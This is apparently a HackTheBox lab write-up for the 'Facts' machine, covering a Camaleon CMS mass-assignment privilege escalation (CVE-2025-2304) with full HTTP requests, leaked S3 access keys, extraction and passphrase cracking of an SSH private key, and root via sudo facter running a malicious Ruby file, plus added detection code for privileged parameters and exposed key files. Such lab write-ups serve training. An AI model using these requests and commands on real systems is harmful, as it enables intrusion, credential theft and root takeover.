[TOC]

## Fact

https://app.hackthebox.com/machines/Facts?sort_by=created_at&sort_type=desc

![image](https://hackmd.io/_uploads/Sy72Z85sWe.png)

### Finding services and versions

:::info
nmap 10.129.244.96 -sV -A
:::

The target has ports 80 and 22 open.

![image](https://hackmd.io/_uploads/r1uUSHqoZl.png)

I looked for exploitable CVEs based on the versions found, but turned up nothing...

### Port 80

Visiting the site, it turns out to be a blog-like website. From the screenshot below it is a Camaleon CMS, a dynamic content management system built on Ruby on Rails.

![image](https://hackmd.io/_uploads/HJx9NBqibg.png)

Browsing further turns up /page and /search, but fuzzing their parameters produced nothing interesting. Brute-forcing paths revealed an admin path that only redirects; following the redirect leads to a login page.

![image](https://hackmd.io/_uploads/HyzmNBcibl.png)

![image](https://hackmd.io/_uploads/ByNmvBcsbl.png)

I had already looked at the two bigger known Camaleon CMS vulnerabilities, CVE-2025-2304 and CVE-2024-46986, without a clear plan; once the login page turned up, CVE-2025-2304 looked worth trying.

### CVE-2025-2304

:::info
The problem lies in `.permit!`: it writes every user-supplied value carried by `params.require` straight into the database.

Assume the input looks like this:

`{ "password" => "hacked123", "role" => "admin", "is_admin" => true }`

`.permit!` writes each value into the matching column. If `role` or `is_admin` columns exist, changing their values succeeds and elevates privileges.

```
def updated_ajax
  # permit! accepts every submitted attribute, so role / is_admin are mass-assigned
  user_params = params.require(:user).permit!
  current_user.update(user_params)
end
```
:::

http://facts.htb/admin/login

```
POST /admin/login HTTP/1.1
Host: facts.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _factsapp_session=%2FdC6I7ol%2Bst1r8szKGGGd70DRB9lRXDhhXapQn9cj%2BNXGJ8CACjSbX3pDH7h2WxSsUac4olxtHkj5MlSuklGUWJjdAakFEDEvpOizWVRMWRLoS6LJz1YfY6Oe96cRvdwKmy98PxakYZR76hMPYya2tCVsebe3NFWhCNkD9dR%2B9AXV1JNL6aFEW1alO1uSN1wrJvldrlTzZXW9e7z2Fe4P0XGQLMtGx1BgoRC6PBw80UbCRVM6snFHEKVu91JWri7RLWZk78yde%2FEDeb061oZZdSZ3%2B9LDmsZts7%2BrxkRIzB7DhuBGqddEA9WWh6M3KYGwIzOz4RAiLAMuWclxOdjtzaZn4mk55YbG5hcmB3dLhjJ%2Fy6Yx9fahx0%3D--mqau9n9PDQ0g%2Bqre--uFsKcWyH3o%2BNbCdVzVvxYQ%3D%3D
Connection: close

authenticity_token=5J91WenYidkCIXYmi6EDjxwxlXNodhEqVxWcKDOpP5MxjQ2zhHbhQpgp0dTvvFFQ91oe2yffVaRDbXW_gpE6TQ&user%5Busername%5D=bali&user%5Bpassword%5D=bali123&user%5Brole%5D=admin&user%5Bis_admin%5D=true
```

```
POST /admin/users/5 HTTP/1.1
Host: facts.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: auth_token=uQJH7h7nrGq_Co1ogCX2-A%26Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F120.0.0.0+Safari%2F537.36%2610.10.17.197; _factsapp_session=N64ab2HTYUUR9dmltZwhf7yhHbQ%2B9%2BmU6WSWp3cF8YK4%2Fw50LQJgcs0G97kSQEKm74kMY93%2BWNRDJhee79rFGAk4Cdjbio7z7%2FqUUp%2BK0Du25IjbJ6dKrCRBf7R2fvy81ifNQNhqtCm02KgNxka%2FhYP95QfvDQN8FJEpww9Z6bns9j0FST9pjKQOhEig8HnaV%2Bs6RQQ9AOulWV0zULr3J5RFd%2F6cdf8fU7lPfPZlZoAT8mBuoj62ejYJC5WBy3IdbAHCqqxv3QSpWxliiEFB0ltlVEbzEc5CfNsaJqvIvm8kX%2FXH6u%2FFjJlWHNtYh%2F8%2FmF%2FG3vDZZCz0pQfIyxoxsaBWd3MXCVdzRIanf59mjfcKYEeuNJ0Rt0E%3D--S10wtQURSEyIy0vX--sHUYaQ6RoMiuBwDsaU8zEw%3D%3D
Connection: close

_method=patch&authenticity_token=EpeFMQpTE_8sm88Uh13SfCn7mgL0WYSutwnIVelCr7pZNz5ijiIZDsBQA3ztn8aakjTdrN_Rknx9FSMdv9pIvg&meta%5Bavatar%5D=&user%5Busername%5D=bali&user%5Bemail%5D=test%40test.com&user%5Bfirst_name%5D=bali&user%5Blast_name%5D=lin&meta%5Bslogan%5D=123&user%5Brole%5D=admin&user%5Bis_admin%5D=true
```

My own attempts kept failing, so I used an existing open-source PoC for the CVE: https://github.com/d3vn0mi/cve-2025-2304-poc

What finally worked was `password[role]=admin`, not `user[role]=admin`.

![image](https://hackmd.io/_uploads/ByCQfHfhbe.png)

Now I am admin.

![image](https://hackmd.io/_uploads/SJHHVrGhZg.png)

Poking around the admin panel turned up AWS S3 information:

![image](https://hackmd.io/_uploads/Bk5pZuQnZl.png)

```
AKIA808C72183237BB40
ZkKBOjSNm2V82l3w6Pu2+JcRe8PS2bTwaipboiaW
randomfacts
us-east-1
http://localhost:54321
http://facts.htb/randomfacts
```
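The `.permit!` mass-assignment issue above, shown as an added Ruby example (my own code, not Camaleon CMS's and not from the PoC): `permit_all` stands in for `permit!`, `permit_allowlist` is the strong-parameters fix, and `privileged_keys_in` is a log-side check that flags a form body trying to set `role`/`is_admin` under any nested scope, so it catches both the `user[...]` and `password[...]` variants. The allow-list and the sample body are assumptions constructed for the example.

```ruby
require 'cgi'

# Attributes that must never be settable by the requester (seen in the requests above).
PRIVILEGED_ATTRS = %w[role is_admin].freeze
# Hypothetical allow-list a hardened controller would permit instead of permit!.
ALLOWED_USER_ATTRS = %w[username email first_name last_name password].freeze

# What `params.require(:user).permit!` amounts to: every submitted key is kept.
def permit_all(user_params)
  user_params.dup
end

# Strong-parameters equivalent of permit(:username, :email, ...): keep only
# allow-listed keys and return the rejected ones so the caller can log them.
def permit_allowlist(user_params, allowed = ALLOWED_USER_ATTRS)
  kept = user_params.select { |k, _| allowed.include?(k) }
  [kept, user_params.keys - kept.keys]
end

# Parse a Rails-style form body ("user[role]=admin&...") into nested hashes,
# so any scope (user[...], password[...], meta[...]) is inspected the same way.
def parse_nested_form(body)
  CGI.parse(body).each_with_object({}) do |(key, values), out|
    if (m = key.match(/\A(\w+)\[(\w+)\]\z/))
      out[m[1]] = {} unless out[m[1]].is_a?(Hash)
      out[m[1]][m[2]] = values.first
    else
      out[key] = values.first
    end
  end
end

# Detection helper: list every nested parameter in the body that tries to set
# a privileged attribute, whichever scope it is sent under.
def privileged_keys_in(body)
  parse_nested_form(body).flat_map do |scope, value|
    next [] unless value.is_a?(Hash)
    (value.keys & PRIVILEGED_ATTRS).map { |k| "#{scope}[#{k}]" }
  end
end

# Constructed body in the shape of the login request from this write-up.
SAMPLE_BODY = 'authenticity_token=constructed&user%5Busername%5D=bali' \
              '&user%5Bpassword%5D=bali123&user%5Brole%5D=admin&user%5Bis_admin%5D=true'
```

Feeding `SAMPLE_BODY` through `permit_allowlist(parse_nested_form(SAMPLE_BODY)["user"])` drops `role` and `is_admin`, which is exactly what `permit!` fails to do.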
### Using AWS S3

A profile has to be configured before the CLI can be used:

```
aws configure --profile facts
```

I kept trying under randomfacts, but it only held image files. I also tried uploading odd things, to no effect: S3 does not execute them.

```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls s3://randomfacts/ --recursive
```

![image](https://hackmd.io/_uploads/rJ8ffd72Zg.png)

After asking an AI I learned how to list bucket names, and found s3://internal.

```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls
```

![image](https://hackmd.io/_uploads/S1jumdmnZe.png)

Listing the contents of s3://internal shows a .ssh/id_ed25519 private key.

```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls s3://internal --recursive
```

![image](https://hackmd.io/_uploads/HJoHEOm3be.png)

cat cannot be used here, so cp the object to `-`, which means stdout:

```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 cp s3://internal/.ssh/id_ed25519 -
```

This prints the OpenSSH private key block (`-----BEGIN OPENSSH PRIVATE KEY-----` through `-----END OPENSSH PRIVATE KEY-----`).

While here, also read .profile, which may hold important clues about the environment:

:::success
```
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
        . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/.local/bin" ] ; then
    PATH="$HOME/.local/bin:$PATH"
fi
```
:::
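The bucket audit a defender would run on the `s3 ls --recursive` output above, as an added Ruby example (my own code, not from this write-up): it parses the CLI's object-listing lines and flags keys like `.ssh/id_ed25519` or `.profile` that should never sit in a bucket reachable with shared access keys. The listing and the pattern table are constructed assumptions for the example.

```ruby
# Constructed listing in the format `aws s3 ls s3://bucket --recursive` prints
# (date, time, size in bytes, object key); the entries are made up.
SAMPLE_LISTING = <<~LS
  2025-01-10 09:12:03        411 .ssh/id_ed25519
  2025-01-10 09:12:03         96 .ssh/id_ed25519.pub
  2025-01-10 09:12:04        807 .profile
  2025-01-11 14:30:00     204800 images/cat.jpg
  2025-01-11 14:30:01       1024 backup/.aws/credentials
LS

# Object keys that should never be reachable with shared access keys.
SENSITIVE_PATTERNS = {
  "ssh private key" => %r{(\A|/)\.ssh/id_(rsa|dsa|ecdsa|ed25519)\z},
  "shell profile"   => %r{(\A|/)\.(profile|bashrc|bash_history)\z},
  "aws credentials" => %r{(\A|/)\.aws/credentials\z},
  "dotenv file"     => %r{(\A|/)\.env\z},
}.freeze

S3Entry = Struct.new(:date, :time, :size, :key)

# Parse one `aws s3 ls --recursive` line per object; anything else is skipped
# (bucket-level `aws s3 ls` lines have no size column, so they are ignored).
def parse_s3_listing(text)
  text.each_line.filter_map do |line|
    m = line.match(/\A\s*(\d{4}-\d{2}-\d{2}) (\d{2}:\d{2}:\d{2})\s+(\d+) (.+?)\s*\z/)
    m && S3Entry.new(m[1], m[2], m[3].to_i, m[4])
  end
end

# Return the objects whose key matches a sensitive pattern, with the reason.
def sensitive_objects(text)
  parse_s3_listing(text).filter_map do |e|
    label, _re = SENSITIVE_PATTERNS.find { |_, re| re.match?(e.key) }
    label && { key: e.key, reason: label, size: e.size }
  end
end
```

Pipe real output in with `sensitive_objects($stdin.read)`; the `.pub` file is deliberately not flagged, only the private half is.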
### SSH connection

I now have the private key but still don't know the username. I tried these:

```
id_ed25519
admin
internal
randomfacts
```

Using the downloaded key directly gives this error:

:::info
WARNING: UNPROTECTED PRIVATE KEY FILE!
:::

To get rid of it, set the key file's permissions to 600:

```
chmod 600 htbKey
```

After that this error appeared, meaning the private key is passphrase-protected:

:::info
Load key "sshKey": incorrect passphrase supplied to decrypt private key
:::

The message came up because I wanted to use `ssh-keygen -y -f sshKey` to find the login username, but it needs the passphrase, so the passphrase has to be cracked.

#### Cracking the passphrase

Convert the key to john's format first:

```
ssh2john sshKey > sshKey.hash
```

Then crack it with john and show the password:

```
john --wordlist=/usr/share/wordlists/rockyou.txt sshKey.hash
john --show sshKey.hash
```

<!-- ![image](https://hackmd.io/_uploads/r18cnKm2Wl.png) -->

#### Finding the SSH username

With the passphrase known, go back to this command: it prints the corresponding public key, whose comment field contains the username.

```
ssh-keygen -y -f sshKey
```

:::success
Enter passphrase for "sshKey":
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKSV0hsk3XXWG35DEe0iM+VycFL1iX7XT2+EZEca0JT+ trivia@facts.htb
:::

With the private key, its passphrase and the username, I can SSH in. That gives a shell on the target and the first flag.

![image](https://hackmd.io/_uploads/S19uatm2-x.png)

### Privilege escalation

<!--
Try privilege escalation starting from the most common step: look for files that run with root privileges.

```
find / -perm -u=s -type f 2>/dev/null
```

- -perm: search for specific permission bits
- -type f: restrict to regular files
-->

First check the sudo list: /usr/bin/facter can be run without a password.

```
sudo -l
```

:::success
```
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter
```
:::

Check https://gtfobins.org/ for how to use facter. The issue with facter is that it lets users write custom Ruby scripts to extend it: when facter runs, it looks for and executes those .rb files, and because it runs under sudo here, they execute as root.

![image](https://hackmd.io/_uploads/HJjzGcQnbg.png)

So first write a malicious rb file:

```
echo 'exec "/bin/bash"' > /tmp/exploit.rb
```

Then use sudo facter to load the malicious file:

```
sudo facter --custom-dir=/tmp x
```

![image](https://hackmd.io/_uploads/BylFz9mnWe.png)

Now go and find the second flag.